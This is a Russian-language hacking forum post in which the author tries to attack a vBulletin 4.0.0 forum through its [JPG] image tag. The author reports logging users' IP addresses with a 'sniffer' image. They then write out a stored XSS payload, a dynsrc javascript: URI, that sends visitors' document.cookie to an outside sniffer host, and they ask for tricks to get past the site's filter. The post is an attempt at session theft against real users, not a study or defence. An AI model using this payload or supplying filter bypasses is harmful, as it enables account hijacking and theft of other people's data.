Столкнулся с такой проблеммой:
На одном форуме нашел возможность добавление
code:
[JPG][/JPG]
Добавил картинку со сниффера - прокатило, и он даже IP пользователей ловит =)
Дальше пробовал поставить Пробел после ссылки на картинку и опять всё отлично =)
Но при попытке вставить Java код, а точнее
code:
http://httpz.ru/картинка dynsrc=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/сниффер?"+document.cookie;')
картинка убивается и на её месте пустое место.
Собственно вопрос - Если такая фигня, активная XSS еще возможно? или полностью отпадает?
p.s Пробовал lowsrc и перестановку Java скрипта.. Картинка всё так же не читается)
p.s.s. Вот всё, что известно мне о сайте.
1)Форум стоит на булке v4.0.0
2)Фильтратор изменяет такие символы, как и "
3)Перевод скриптов в Hex и Юник делают скрипт нечитаемым (хотя он остаётся целым)
Что можно еще попробовать сделать с скриптом?) Интересны все предложения =)